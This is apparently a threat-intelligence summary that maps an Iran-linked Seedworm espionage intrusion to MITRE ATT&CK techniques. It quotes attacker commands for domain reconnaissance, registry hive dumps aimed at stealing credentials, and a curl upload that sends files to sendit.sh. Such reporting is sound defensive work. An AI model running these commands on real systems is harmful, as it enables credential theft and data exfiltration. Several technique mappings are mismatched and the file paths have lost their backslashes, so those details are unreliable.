Seedworm: Iran-Linked Hackers Breached Korean Electronics Maker in Global Spying Campaign

MITRE Techniques

• [T1574.002] Hijack Execution Flow: DLL Side-Loading – Legitimately signed executables were used to load malicious DLLs and run attacker code (‘abused to sideload a malicious DLL’).
• [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell was used for reconnaissance, screenshot capture, payload retrieval, and repeated host checks (‘PowerShell-based reconnaissance commands’).
• [T1059.006] Command and Scripting Interpreter: JavaScript – Node.js scripts orchestrated multiple stages of the intrusion and drove the loader chain (‘suggesting that the sideloading was orchestrated by a Node.js script’).
• [T1027] Obfuscated Files or Information – Encoded blobs and randomly named directories were used to stage payloads and hide activity (‘a.dat is believed to be an encoded payload’).
• [T1119] Automated Collection – A script appears to have captured screenshots from the victim host (‘appears to have captured a screenshot of the user’s primary display’).
• [T1082] System Information Discovery – The attackers enumerated host details, users, groups, and network settings (‘whoami /all’, ‘hostname’, ‘ipconfig /all’).
• [T1087.002] Account Discovery: Domain Account – Domain users and groups were enumerated to map the environment (‘net user /domain’, ‘net group [REMOVED] /domain’).
• [T1518.001] Software Discovery: Security Software Discovery – WMI was used to identify installed antivirus products (‘enumerate antivirus products registered with the Security Center’).
• [T1110] Brute Force – Not observed directly; credential acquisition was instead performed through prompts and hive theft, so no direct brute-force use is supported.
• [T1003.004] OS Credential Dumping: LSA Secrets – The attackers saved SECURITY and SYSTEM hives to extract cached secrets and credentials (‘reg save hklmsecurity …’, ‘reg save hklmsystem …’).
• [T1003.002] OS Credential Dumping: Security Account Manager – The SAM hive was saved for offline hash extraction (‘reg save hklmsam C:WindowsTempsam.save’).
• [T1003.001] OS Credential Dumping: LSASS Memory – The activity aimed to obtain elevated credentials and likely reach LSASS (‘seeking SYSTEM privileges in order to reach LSASS’).
• [T1056.002] Input Capture: GUI Input Capture – A credential harvester invoked the Windows credentials prompt to capture entered passwords (‘calls CredUIPromptForWindowsCredentialsW’).
• [T1068] Exploitation for Privilege Escalation – A dedicated tool attempted privilege escalation by abusing Kerberos/GSS-API delegation (‘automates Kerberos Ticket Granting Ticket extraction’).
• [T1550.003] Use Alternate Authentication Material: Pass the Ticket – A TGT was extracted from a high-privilege user for later use (‘obtain a usable TGT from a high-privilege user’).
• [T1090.001] Proxy: Internal Proxy – SOCKS5 reverse-proxy tunnelling was used to relay traffic through the victim host (‘SOCKS5 reverse-proxy tunnelling’).
• [T1219] Remote Access Software – The attackers relied on public file-transfer and staging services to move data (‘staged stolen data through sendit[.]sh’).
• [T1041] Exfiltration Over C2 Channel – Stolen data was transferred out via HTTPS to a public file-transfer service (‘curl.exe -F “file=@C:WindowsTemp” https://sendit.sh’).
• [T1105] Ingress Tool Transfer – Additional scripts and payloads were downloaded from attacker-controlled infrastructure (‘pulling a PowerShell payload from an attacker-controlled staging server’).